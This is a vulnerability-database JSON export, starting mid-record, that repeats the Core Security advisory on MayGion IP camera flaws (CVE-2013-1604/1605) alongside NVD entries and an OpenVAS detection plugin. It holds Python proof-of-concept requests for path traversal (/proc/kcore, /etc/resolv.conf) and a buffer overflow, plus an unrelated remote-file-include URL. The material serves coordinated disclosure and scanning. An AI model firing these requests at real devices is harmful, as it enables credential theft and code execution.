attacker.\r\n \r\n/-----\r\nimport httplib\r\n \r\nconn = httplib.HTTPConnection(\"192.168.100.1\")\r\nconn.request(\"GET\", \"/../../../../../../../../../proc/kcore\")\r\nresp = conn.getresponse()\r\ndata = resp.read()\r\nconn.close()\r\n-----/\r\n \r\n7.2. *Buffer overflow*\r\n \r\n[CVE-2013-1605] The following Python script can be used to trigger the\r\nvulnerability without authentication. As a result, the Instruction\r\nPointer register (IP) will be overwritten with 0x61616161, which is a\r\ntypical buffer overrun condition.\r\n \r\n/-----\r\nimport httplib\r\n \r\nconn = httplib.HTTPConnection(\"192.168.100.1\")\r\nconn.request(\"GET\", \"/\" + \"A\" * 3000 + \".html\")\r\nresp = conn.getresponse()\r\ndata = resp.read()\r\nconn.close()\r\n-----/\r\n \r\n8. *Report Timeline*\r\n \r\n. 2013-05-02:\r\nCore Security Technologies notifies MayGion of the vulnerabilities.\r\nPublication date is set for May 29th, 2013.\r\n \r\n. 2013-05-02:\r\nVendor asks for a report with technical information.\r\n \r\n. 2013-05-03:\r\nA draft advisory containing technical details sent to MayGion team.\r\n \r\n. 2013-05-03:\r\nVendor notifies that all vulnerabilities were fixed in the last firmware\r\nversion, released April 22nd, 2013.\r\n \r\n. 2013-05-09:\r\nCore asks for a list of affected devices and firmware. No reply received.\r\n \r\n. 2013-05-28:\r\nAdvisory CORE-2013-0322 is published.\r\n \r\n9. *References*\r\n \r\n[1] http://www.maygion.com\r\n \r\n10. *About CoreLabs*\r\n \r\nCoreLabs, the research center of Core Security Technologies, is charged\r\nwith anticipating the future needs and requirements for information\r\nsecurity technologies. We conduct our research in several important\r\nareas of computer security including system vulnerabilities, cyber\r\nattack planning and simulation, source code auditing, and cryptography.\r\nOur results include problem formalization, identification of\r\nvulnerabilities, novel solutions and prototypes for new technologies.\r\nCoreLabs regularly publishes security advisories, technical papers,\r\nproject information and shared software tools for public use at:\r\nhttp://corelabs.coresecurity.com.\r\n \r\n11. *About Core Security Technologies*\r\n \r\nCore Security Technologies enables organizations to get ahead of threats\r\nwith security test and measurement solutions that continuously identify\r\nand demonstrate real-world exposures to their most critical assets. Our\r\ncustomers can gain real visibility into their security standing, real\r\nvalidation of their security controls, and real metrics to more\r\neffectively secure their organizations.\r\n \r\nCore Security's software solutions build on over a decade of trusted\r\nresearch and leading-edge threat expertise from the company's Security\r\nConsulting Services, CoreLabs and Engineering groups. Core Security\r\nTechnologies can be reached at +1 (617) 399-6980 or on the Web at:\r\nhttp://www.coresecurity.com.\r\n \r\n12. *Disclaimer*\r\n \r\nThe contents of this advisory are copyright (c) 2013 Core Security\r\nTechnologies and (c) 2013 CoreLabs, and are licensed under a Creative\r\nCommons Attribution Non-Commercial Share-Alike 3.0 (United States)\r\nLicense: http://creativecommons.org/licenses/by-nc-sa/3.0/us/\r\n \r\n13. *PGP/GPG Keys*\r\n \r\nThis advisory has been signed with the GPG key of Core Security\r\nTechnologies advisories team, which is available for download at\r\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc.", "modified": "2014-07-01T00:00:00", "published": "2014-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-79467", "id": "SSV:79467", "title": "MayGion IP Cameras Firmware 09.27 - Multiple Vulnerabilities", "type": "seebug", "sourceData": "", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": ""}], "cve": [{"lastseen": "2019-05-29T18:13:01", "bulletinFamily": "NVD", "description": "Buffer overflow in MayGion IP Cameras with firmware before 2013.04.22 (05.53) allows remote attackers to execute arbitrary code via a long filename in a GET request.\nPer: http://www.coresecurity.com/advisories/maygion-IP-cameras-multiple-vulnerabilities\n\n\"Multiple vulnerabilities have been found in MayGion IP cameras [1] based on firmware v09.27 and below\"", "modified": "2017-08-29T01:33:00", "id": "CVE-2013-1605", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1605", "published": "2014-03-25T18:21:00", "title": "CVE-2013-1605", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:13:01", "bulletinFamily": "NVD", "description": "Directory traversal vulnerability in MayGion IP Cameras with firmware before 2013.04.22 (05.53) allows remote attackers to read arbitrary files via a .. (dot dot) in the default URI.\nPer: http://www.coresecurity.com/advisories/maygion-IP-cameras-multiple-vulnerabilities\n\n\"Multiple vulnerabilities have been found in MayGion IP cameras [1] based on firmware v09.27 and below\"", "modified": "2017-08-29T01:33:00", "id": "CVE-2013-1604", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-1604", "published": "2014-03-25T18:21:00", "title": "CVE-2013-1604", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "openvas": [{"lastseen": "2019-05-29T18:37:57", "bulletinFamily": "scanner", "description": "This host is running MayGion IP Camera and is prone to multiple\n vulnerabilities.", "modified": "2019-02-05T00:00:00", "published": "2013-10-28T00:00:00", "id": "OPENVAS:1361412562310803774", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310803774", "title": "MayGion IP Cameras Multiple Vulnerabilities", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_maygion_ipcamera_mult_vuln.nasl 13469 2019-02-05 12:31:12Z tpassfeld $\n#\n# MayGion IP Cameras Multiple Vulnerabilities\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.803774\");\n script_version(\"$Revision: 13469 $\");\n script_bugtraq_id(60192, 60196);\n script_cve_id(\"CVE-2013-1604\", \"CVE-2013-1605\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-02-05 13:31:12 +0100 (Tue, 05 Feb 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-10-28 15:46:55 +0530 (Mon, 28 Oct 2013)\");\n script_name(\"MayGion IP Cameras Multiple Vulnerabilities\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote attackers to gain access to\n information or cause a buffer overflow, resulting in a denial of service\n or potentially allowing the execution of arbitrary code.\");\n script_tag(name:\"vuldetect\", value:\"Send a crafted exploit string via HTTP GET request and check whether it\n is able to read the sensitive information or not.\");\n script_tag(name:\"insight\", value:\"- The flaw is due to the program not properly sanitizing user input,\n specifically directory traversal style attacks (e.g., ../../).\n\n - User-supplied input is not properly validated when handling a specially\n crafted GET request. This may allow a remote attacker to cause a buffer\n overflow, resulting in a denial of service or potentially allowing the\n execution of arbitrary code.\");\n script_tag(name:\"solution\", value:\"Upgrade to H.264 ipcam firmware 2013.04.22 or later.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"This host is running MayGion IP Camera and is prone to multiple\n vulnerabilities.\");\n script_tag(name:\"affected\", value:\"MayGion IP cameras firmware version 2011.27.09\");\n\n script_xref(name:\"URL\", value:\"http://seclists.org/fulldisclosure/2013/May/194\");\n script_xref(name:\"URL\", value:\"http://www.coresecurity.com/advisories/maygion-IP-cameras-multiple-vulnerabilities\");\n\n script_category(ACT_ATTACK);\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_maygion_ipcamera_detect.nasl\");\n script_require_ports(\"Services/www\", 81);\n script_mandatory_keys(\"maygion/ip_camera/detected\");\n\n script_xref(name:\"URL\", value:\"http://www.maygion.com\");\n exit(0);\n}\n\n\ninclude(\"host_details.inc\");\ninclude(\"http_func.inc\");\n\nCPE = \"cpe:/a:maygion:ip_camera\";\n\nif(!port = get_app_port(cpe:CPE)) exit(0);\nif(!get_app_location(cpe:CPE, port:port)) exit(0); # nb: Unused but added to have a reference to the Detection-NVT in the GSA\n\nreq = 'GET /../../../../../../../../../etc/resolv.conf HTTP/1.1\\r\\n\\r\\n';\nres = http_send_recv(port:port, data:req, bodyonly:FALSE);\n\nif(res =~ \"HTTP/1.. 200 OK\" && \"nameserver\" >< res &&\n \"application/octet-stream\" >< res)\n{\n security_message(port:port);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:48", "bulletinFamily": "software", "description": "\r\n\r\nCore Security - Corelabs Advisory\r\nhttp://corelabs.coresecurity.com/\r\n\r\nMayGion IP Cameras multiple vulnerabilities\r\n\r\n1. *Advisory Information*\r\n\r\nTitle: MayGion IP Cameras multiple vulnerabilities\r\nAdvisory ID: CORE-2013-0322\r\nAdvisory URL:\r\nhttp://www.coresecurity.com/advisories/maygion-IP-cameras-multiple-vulnerabilities\r\nDate published: 2013-05-28\r\nDate of last update: 2013-05-28\r\nVendors contacted: MayGion\r\nRelease mode: Coordinated release\r\n\r\n2. *Vulnerability Information*\r\n\r\nClass: Path traversal [CWE-22], Buffer overflow [CWE-119]\r\nImpact: Code execution, Security bypass\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2013-1604, CVE-2013-1605\r\n\r\n3. *Vulnerability Description*\r\n\r\nMultiple vulnerabilities have been found in MayGion IP cameras [1] based\r\non firmware v09.27 and below, that could allow an unauthenticated remote\r\nattacker:\r\n\r\n 1. [CVE-2013-1604] to dump the camera's memory and retrieve user\r\ncredentials,\r\n 2. [CVE-2013-1605] to execute arbitrary code.\r\n\r\n4. *Vulnerable Packages*\r\n\r\n . MayGion IP cameras based on firmware 2011.27.09.\r\n . Other firmware versions are probably affected too but they were not\r\nchecked.\r\n\r\n5. *Non-Vulnerable Packages*\r\n\r\n . H.264 ipcam firmware 2013.04.22.\r\n\r\n6. *Credits*\r\n\r\nThese vulnerabilities were discovered and researched by Nahuel Riva and\r\nFrancisco Falcon from Core Exploit Writers Team.\r\n\r\n7. *Technical Description / Proof of Concept Code*\r\n\r\n7.1. *User Credentials Leaked via Path Traversal*\r\n\r\n[CVE-2013-1604] The following Python code exploits a path traversal and\r\ndumps the camera's memory. Valid user credentials can be extracted from\r\nthis memory dump by an unauthenticated remote attacker.\r\n\r\n/-----\r\nimport httplib\r\n\r\nconn = httplib.HTTPConnection("192.168.100.1")\r\nconn.request("GET", "/../../../../../../../../../proc/kcore")\r\nresp = conn.getresponse()\r\ndata = resp.read()\r\nconn.close()\r\n-----/\r\n\r\n7.2. *Buffer overflow*\r\n\r\n[CVE-2013-1605] The following Python script can be used to trigger the\r\nvulnerability without authentication. As a result, the Instruction\r\nPointer register (IP) will be overwritten with 0x61616161, which is a\r\ntypical buffer overrun condition.\r\n\r\n/-----\r\nimport httplib\r\n\r\nconn = httplib.HTTPConnection("192.168.100.1")\r\nconn.request("GET", "/" + "A" * 3000 + ".html")\r\nresp = conn.getresponse()\r\ndata = resp.read()\r\nconn.close()\r\n-----/\r\n\r\n8. *Report Timeline*\r\n\r\n. 2013-05-02:\r\nCore Security Technologies notifies MayGion of the vulnerabilities.\r\nPublication date is set for May 29th, 2013.\r\n\r\n. 2013-05-02:\r\nVendor asks for a report with technical information.\r\n\r\n. 2013-05-03:\r\nA draft advisory containing technical details sent to MayGion team.\r\n\r\n. 2013-05-03:\r\nVendor notifies that all vulnerabilities were fixed in the last firmware\r\nversion, released April 22nd, 2013.\r\n\r\n. 2013-05-09:\r\nCore asks for a list of affected devices and firmware. No reply received.\r\n\r\n. 2013-05-28:\r\nAdvisory CORE-2013-0322 is published.\r\n\r\n9. *References*\r\n\r\n[1] http://www.maygion.com\r\n\r\n10. *About CoreLabs*\r\n\r\nCoreLabs, the research center of Core Security Technologies, is charged\r\nwith anticipating the future needs and requirements for information\r\nsecurity technologies. We conduct our research in several important\r\nareas of computer security including system vulnerabilities, cyber\r\nattack planning and simulation, source code auditing, and cryptography.\r\nOur results include problem formalization, identification of\r\nvulnerabilities, novel solutions and prototypes for new technologies.\r\nCoreLabs regularly publishes security advisories, technical papers,\r\nproject information and shared software tools for public use at:\r\nhttp://corelabs.coresecurity.com.\r\n\r\n11. *About Core Security Technologies*\r\n\r\nCore Security Technologies enables organizations to get ahead of threats\r\nwith security test and measurement solutions that continuously identify\r\nand demonstrate real-world exposures to their most critical assets. Our\r\ncustomers can gain real visibility into their security standing, real\r\nvalidation of their security controls, and real metrics to more\r\neffectively secure their organizations.\r\n\r\nCore Security's software solutions build on over a decade of trusted\r\nresearch and leading-edge threat expertise from the company's Security\r\nConsulting Services, CoreLabs and Engineering groups. Core Security\r\nTechnologies can be reached at +1 (617) 399-6980 or on the Web at:\r\nhttp://www.coresecurity.com.\r\n\r\n12. *Disclaimer*\r\n\r\nThe contents of this advisory are copyright (c) 2013 Core Security\r\nTechnologies and (c) 2013 CoreLabs, and are licensed under a Creative\r\nCommons Attribution Non-Commercial Share-Alike 3.0 (United States)\r\nLicense: http://creativecommons.org/licenses/by-nc-sa/3.0/us/\r\n\r\n13. *PGP/GPG Keys*\r\n\r\nThis advisory has been signed with the GPG key of Core Security\r\nTechnologies advisories team, which is available for download at\r\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc.\r\n\r\n", "modified": "2013-06-05T00:00:00", "published": "2013-06-05T00:00:00", "id": "SECURITYVULNS:DOC:29457", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:29457", "title": "CORE-2013-0322 - MayGion IP Cameras multiple vulnerabilities", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:51", "bulletinFamily": "software", "description": "Buffer overflow, directory traversal.", "modified": "2013-06-05T00:00:00", "published": "2013-06-05T00:00:00", "id": "SECURITYVULNS:VULN:13118", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13118", "title": "MayGion IP cameras security vulnerabilities", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:17", "bulletinFamily": "software", "description": "# SaVSaK.CoM | SpC-x - The-BeKiR |\r\n\r\n# CzarNews v1.14 Version - Remote File Include Vulnerabilities\r\n\r\n# Risk : High\r\n\r\n# Class: Remote\r\n\r\n# Script : CzarNews\r\n\r\n# Credits : SpC-x\r\n\r\n# Thanks : The-BeKiR - Ejder - FasTBoY - ERNE - RMx - Nukedx - Str0ke\r\n\r\n# Code : \r\n\r\n# if(file_exists($tpath . "cn_config.php")) \r\n# require_once($tpath . "cn_config.php");\r\n\r\n# Vulnerable :\r\n\r\n# http://www.victim.com/CzarNews/headlines.php?tpath=Command-Shell", "modified": "2006-06-13T00:00:00", "published": "2006-06-13T00:00:00", "id": "SECURITYVULNS:DOC:13118", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:13118", "title": "CzarNews v1.14 Version - Remote File Include Vulnerabilities", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}], "exploitdb": [{"lastseen": "2016-02-03T02:13:52", "bulletinFamily": "exploit", "description": "MayGion IP Cameras Firmware 09.27 - Multiple Vulnerabilities. CVE-2013-1604,CVE-2013-1605. Webapps exploit for hardware platform", "modified": "2013-05-29T00:00:00", "published": "2013-05-29T00:00:00", "id": "EDB-ID:25813", "href": "https://www.exploit-db.com/exploits/25813/", "type": "exploitdb", "title": "MayGion IP Cameras Firmware 09.27 - Multiple Vulnerabilities", "sourceData": "Core Security - Corelabs Advisory\r\nhttp://corelabs.coresecurity.com/\r\n\r\nMayGion IP Cameras multiple vulnerabilities\r\n\r\n1. *Advisory Information*\r\n\r\nTitle: MayGion IP Cameras multiple vulnerabilities\r\nAdvisory ID: CORE-2013-0322\r\nAdvisory URL:\r\nhttp://www.coresecurity.com/advisories/maygion-IP-cameras-multiple-vulnerabilities\r\nDate published: 2013-05-28\r\nDate of last update: 2013-05-28\r\nVendors contacted: MayGion\r\nRelease mode: Coordinated release\r\n\r\n2. *Vulnerability Information*\r\n\r\nClass: Path traversal [CWE-22], Buffer overflow [CWE-119]\r\nImpact: Code execution, Security bypass\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2013-1604, CVE-2013-1605\r\n\r\n3. *Vulnerability Description*\r\n\r\nMultiple vulnerabilities have been found in MayGion IP cameras [1] based\r\non firmware v09.27 and below, that could allow an unauthenticated remote\r\nattacker:\r\n\r\n 1. [CVE-2013-1604] to dump the camera's memory and retrieve user\r\ncredentials,\r\n 2. [CVE-2013-1605] to execute arbitrary code.\r\n\r\n4. *Vulnerable Packages*\r\n\r\n . MayGion IP cameras based on firmware 2011.27.09.\r\n . Other firmware versions are probably affected too but they were not\r\nchecked.\r\n\r\n5. *Non-Vulnerable Packages*\r\n\r\n . H.264 ipcam firmware 2013.04.22.\r\n\r\n6. *Credits*\r\n\r\nThese vulnerabilities were discovered and researched by Nahuel Riva and\r\nFrancisco Falcon from Core Exploit Writers Team.\r\n\r\n7. *Technical Description / Proof of Concept Code*\r\n\r\n7.1. *User Credentials Leaked via Path Traversal*\r\n\r\n[CVE-2013-1604] The following Python code exploits a path traversal and\r\ndumps the camera's memory. Valid user credentials can be extracted from\r\nthis memory dump by an unauthenticated remote attacker.\r\n\r\n/-----\r\nimport httplib\r\n\r\nconn = httplib.HTTPConnection(\"192.168.100.1\")\r\nconn.request(\"GET\", \"/../../../../../../../../../proc/kcore\")\r\nresp = conn.getresponse()\r\ndata = resp.read()\r\nconn.close()\r\n-----/\r\n\r\n7.2. *Buffer overflow*\r\n\r\n[CVE-2013-1605] The following Python script can be used to trigger the\r\nvulnerability without authentication. As a result, the Instruction\r\nPointer register (IP) will be overwritten with 0x61616161, which is a\r\ntypical buffer overrun condition.\r\n\r\n/-----\r\nimport httplib\r\n\r\nconn = httplib.HTTPConnection(\"192.168.100.1\")\r\nconn.request(\"GET\", \"/\" + \"A\" * 3000 + \".html\")\r\nresp = conn.getresponse()\r\ndata = resp.read()\r\nconn.close()\r\n-----/\r\n\r\n8. *Report Timeline*\r\n\r\n. 2013-05-02:\r\nCore Security Technologies notifies MayGion of the vulnerabilities.\r\nPublication date is set for May 29th, 2013.\r\n\r\n. 2013-05-02:\r\nVendor asks for a report with technical information.\r\n\r\n. 2013-05-03:\r\nA draft advisory containing technical details sent to MayGion team.\r\n\r\n. 2013-05-03:\r\nVendor notifies that all vulnerabilities were fixed in the last firmware\r\nversion, released April 22nd, 2013.\r\n\r\n. 2013-05-09:\r\nCore asks for a list of affected devices and firmware. No reply received.\r\n\r\n. 2013-05-28:\r\nAdvisory CORE-2013-0322 is published.\r\n\r\n9. *References*\r\n\r\n[1] http://www.maygion.com\r\n\r\n10. *About CoreLabs*\r\n\r\nCoreLabs, the research center of Core Security Technologies, is charged\r\nwith anticipating the future needs and requirements for information\r\nsecurity technologies. We conduct our research in several important\r\nareas of computer security including system vulnerabilities, cyber\r\nattack planning and simulation, source code auditing, and cryptography.\r\nOur results include problem formalization, identification of\r\nvulnerabilities, novel solutions and prototypes for new technologies.\r\nCoreLabs regularly publishes security advisories, technical papers,\r\nproject information and shared software tools for public use at:\r\nhttp://corelabs.coresecurity.com.\r\n\r\n11. *About Core Security Technologies*\r\n\r\nCore Security Technologies enables organizations to get ahead of threats\r\nwith security test and measurement solutions that continuously identify\r\nand demonstrate real-world exposures to their most critical assets. Our\r\ncustomers can gain real visibility into their security standing, real\r\nvalidation of their security controls, and real metrics to more\r\neffectively secure their organizations.\r\n\r\nCore Security's software solutions build on over a decade of trusted\r\nresearch and leading-edge threat expertise from the company's Security\r\nConsulting Services, CoreLabs and Engineering groups. Core Security\r\nTechnologies can be reached at +1 (617) 399-6980 or on the Web at:\r\nhttp://www.coresecurity.com.\r\n\r\n12. *Disclaimer*\r\n\r\nThe contents of this advisory are copyright (c) 2013 Core Security\r\nTechnologies and (c) 2013 CoreLabs, and are licensed under a Creative\r\nCommons Attribution Non-Commercial Share-Alike 3.0 (United States)\r\nLicense: http://creativecommons.org/licenses/by-nc-sa/3.0/us/\r\n\r\n13. *PGP/GPG Keys*\r\n\r\nThis advisory has been signed with the GPG key of Core Security\r\nTechnologies advisories team, which is available for download at\r\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc.", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/25813/"}], "packetstorm": [{"lastseen": "2016-12-05T22:13:29", "bulletinFamily": "exploit", "description": "", "modified": "2013-05-28T00:00:00", "published": "2013-05-28T00:00:00", "href": "https://packetstormsecurity.com/files/121787/MayGion-IP-Camera-Path-Traversal-Buffer-Overflow.html", "id": "PACKETSTORM:121787", "type": "packetstorm", "title": "MayGion IP Camera Path Traversal / Buffer Overflow", "sourceData": "`Core Security - Corelabs Advisory \nhttp://corelabs.coresecurity.com/ \n \nMayGion IP Cameras multiple vulnerabilities \n \n1. *Advisory Information* \n \nTitle: MayGion IP Cameras multiple vulnerabilities \nAdvisory ID: CORE-2013-0322 \nAdvisory URL: \nhttp://www.coresecurity.com/advisories/maygion-IP-cameras-multiple-vulnerabilities \nDate published: 2013-05-28 \nDate of last update: 2013-05-28 \nVendors contacted: MayGion \nRelease mode: Coordinated release \n \n2. *Vulnerability Information* \n \nClass: Path traversal [CWE-22], Buffer overflow [CWE-119] \nImpact: Code execution, Security bypass \nRemotely Exploitable: Yes \nLocally Exploitable: No \nCVE Name: CVE-2013-1604, CVE-2013-1605 \n \n3. *Vulnerability Description* \n \nMultiple vulnerabilities have been found in MayGion IP cameras [1] based \non firmware v09.27 and below, that could allow an unauthenticated remote \nattacker: \n \n1. [CVE-2013-1604] to dump the camera's memory and retrieve user \ncredentials, \n2. [CVE-2013-1605] to execute arbitrary code. \n \n4. *Vulnerable Packages* \n \n. MayGion IP cameras based on firmware 2011.27.09. \n. Other firmware versions are probably affected too but they were not \nchecked. \n \n5. *Non-Vulnerable Packages* \n \n. H.264 ipcam firmware 2013.04.22. \n \n6. *Credits* \n \nThese vulnerabilities were discovered and researched by Nahuel Riva and \nFrancisco Falcon from Core Exploit Writers Team. \n \n7. *Technical Description / Proof of Concept Code* \n \n7.1. *User Credentials Leaked via Path Traversal* \n \n[CVE-2013-1604] The following Python code exploits a path traversal and \ndumps the camera's memory. Valid user credentials can be extracted from \nthis memory dump by an unauthenticated remote attacker. \n \n/----- \nimport httplib \n \nconn = httplib.HTTPConnection(\"192.168.100.1\") \nconn.request(\"GET\", \"/../../../../../../../../../proc/kcore\") \nresp = conn.getresponse() \ndata = resp.read() \nconn.close() \n-----/ \n \n7.2. *Buffer overflow* \n \n[CVE-2013-1605] The following Python script can be used to trigger the \nvulnerability without authentication. As a result, the Instruction \nPointer register (IP) will be overwritten with 0x61616161, which is a \ntypical buffer overrun condition. \n \n/----- \nimport httplib \n \nconn = httplib.HTTPConnection(\"192.168.100.1\") \nconn.request(\"GET\", \"/\" + \"A\" * 3000 + \".html\") \nresp = conn.getresponse() \ndata = resp.read() \nconn.close() \n-----/ \n \n8. *Report Timeline* \n \n. 2013-05-02: \nCore Security Technologies notifies MayGion of the vulnerabilities. \nPublication date is set for May 29th, 2013. \n \n. 2013-05-02: \nVendor asks for a report with technical information. \n \n. 2013-05-03: \nA draft advisory containing technical details sent to MayGion team. \n \n. 2013-05-03: \nVendor notifies that all vulnerabilities were fixed in the last firmware \nversion, released April 22nd, 2013. \n \n. 2013-05-09: \nCore asks for a list of affected devices and firmware. No reply received. \n \n. 2013-05-28: \nAdvisory CORE-2013-0322 is published. \n \n9. *References* \n \n[1] http://www.maygion.com \n \n10. *About CoreLabs* \n \nCoreLabs, the research center of Core Security Technologies, is charged \nwith anticipating the future needs and requirements for information \nsecurity technologies. We conduct our research in several important \nareas of computer security including system vulnerabilities, cyber \nattack planning and simulation, source code auditing, and cryptography. \nOur results include problem formalization, identification of \nvulnerabilities, novel solutions and prototypes for new technologies. \nCoreLabs regularly publishes security advisories, technical papers, \nproject information and shared software tools for public use at: \nhttp://corelabs.coresecurity.com. \n \n11. *About Core Security Technologies* \n \nCore Security Technologies enables organizations to get ahead of threats \nwith security test and measurement solutions that continuously identify \nand demonstrate real-world exposures to their most critical assets. Our \ncustomers can gain real visibility into their security standing, real \nvalidation of their security controls, and real metrics to more \neffectively secure their organizations. \n \nCore Security's software solutions build on over a decade of trusted \nresearch and leading-edge threat expertise from the company's Security \nConsulting Services, CoreLabs and Engineering groups. Core Security \nTechnologies can be reached at +1 (617) 399-6980 or on the Web at: \nhttp://www.coresecurity.com. \n \n12. *Disclaimer* \n \nThe contents of this advisory are copyright (c) 2013 Core Security \nTechnologies and (c) 2013 CoreLabs, and are licensed under a Creative \nCommons Attribution Non-Commercial Share-Alike 3.0 (United States) \nLicense: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ \n \n13. *PGP/GPG Keys* \n \nThis advisory has been signed with the GPG key of Core Security \nTechnologies advisories team, which is available for download at \nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc. \n \n \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/121787/CORE-2013-0322.txt"}]}